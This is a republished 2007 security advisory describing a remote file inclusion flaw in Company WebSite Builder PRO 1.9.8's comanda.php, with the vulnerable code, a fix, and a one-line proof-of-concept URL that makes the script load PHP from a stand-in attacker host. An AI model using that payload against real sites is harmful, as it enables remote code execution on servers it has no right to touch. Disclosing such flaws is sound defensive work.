Lucene search
+L

Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability

🗓️ 16 Mar 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 33 Views

Company WebSite Builder PRO 1.9.8 RFI Vulnerability allows remote file inclusion via invalid include functio

Code

                                                ____________________   ___ ___ ________
\\_   _____/\\_   ___  /   |   \\_____  
 |    __)_ /      //    ~    /   |   
 |        \\     \\___    Y    /    |    
/_______  / \\______  /\\___|_  /\\_______  /
       /         /       /         /                              .OR.ID
ECHO_ADV_76$2007

--------------------------------------------------------------------------------------------
[ECHO_ADV_76$2007] Company WebSite Builder PRO (INCLUDE_PATH) Remote File Inclusion Vulnerability
--------------------------------------------- ----------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : March, 15th 2007
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv76-theday-2007.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~

Application     : Company WebSite Builder PRO ( CWB )
version         : 1.9.8
URL             : http://www.grafxsoftware.com/

This software makes it easy to build an e-commerce site that processes credit cards,
wire transfers. This is a great Content Management System that\'s easy to install and use WITHOUT having
to FTP upload pages every time they need to be updated.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~

- Invalid include function at comanda.php
-----------------------comanda.php------------

<?
...
include($INCLUDE_LANGUAGE_PATH.\"$LANG.inc.php\");
include($INCLUDE_PATH.\"connection.php\");
include_once($INCLUDE_PATH.\"connection.php\");
include_once($INCLUDE_PATH.\"cls_produs.php\");
include_once($INCLUDE_PATH.\"cls_left_menu.php\");
include_once($INCLUDE_PATH.\"cls_stire.php\");
include_once($INCLUDE_PATH.\"cls_orders.php\");
include_once($INCLUDE_PATH.\"cls_headline_prod.php\");
include_once($INCLUDE_PATH.\"cls_checkout.php\");
include_once(\"cls_download_products.php\");
....
?>
----------------------------------------------------------

Input&nbsp;passed&nbsp;to&nbsp;the&nbsp;\"$INCLUDE_PATH\"&nbsp;parameter&nbsp;in&nbsp;comanda.php&nbsp;is&nbsp;not
properly&nbsp;verified&nbsp;before&nbsp;being&nbsp;used.&nbsp;This&nbsp;can&nbsp;be&nbsp;exploited&nbsp;to&nbsp;execute
arbitrary&nbsp;PHP&nbsp;code&nbsp;by&nbsp;including&nbsp;files&nbsp;from&nbsp;local&nbsp;or&nbsp;external
resources.



Proof&nbsp;Of&nbsp;Concept:
~~~~~~~~~~

http://localhost/cwb/comanda.php?INCLUDE_PATH=http://atacker.com/inject.txt?


Solution:
~~

-&nbsp;Sanitize&nbsp;variable&nbsp;$INCLUDE_PATH&nbsp;affected&nbsp;files.
-&nbsp;Turn&nbsp;off&nbsp;register_globals

---------------------------------------------------------------------------

Shoutz:
~
~&nbsp;y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~&nbsp;Jessy&nbsp;Nice&nbsp;Girl
~&nbsp;az001,bomm_3x,matdhule
~&nbsp;[email protected]
~&nbsp;#aikmel&nbsp;-&nbsp;#e-c-h-o&nbsp;@irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
&nbsp;&nbsp;&nbsp;&nbsp;EcHo&nbsp;Research&nbsp;&&nbsp;Development&nbsp;Center
&nbsp;&nbsp;&nbsp;&nbsp;http://advisories.echo.or.id
&nbsp;&nbsp;&nbsp;&nbsp;erdc[at]echo[dot]or[dot]id
&nbsp;&nbsp;&nbsp;&nbsp;the_day[at]echo[dot]or[dot]id

&nbsp;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation